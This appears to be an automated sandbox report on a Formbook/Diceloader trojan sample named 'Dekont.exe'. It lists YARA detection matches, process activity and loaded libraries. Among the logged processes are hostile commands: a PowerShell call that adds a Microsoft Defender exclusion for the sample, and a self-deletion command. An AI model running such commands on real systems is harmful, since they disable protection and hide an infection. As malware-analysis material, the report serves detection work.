          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Dekont.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Dekont.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/6@11/1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_008738B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize,8_2_008738B0
          Source: C:\Users\user\Desktop\Dekont.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dekont.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk4yzx4z.ilz.ps1Jump to behavior
          Source: Dekont.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Dekont.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Dekont.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Dekont.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeProcess created: C:\Users\user\Desktop\Dekont.exe "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Dekont.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Dekont.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Dekont.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
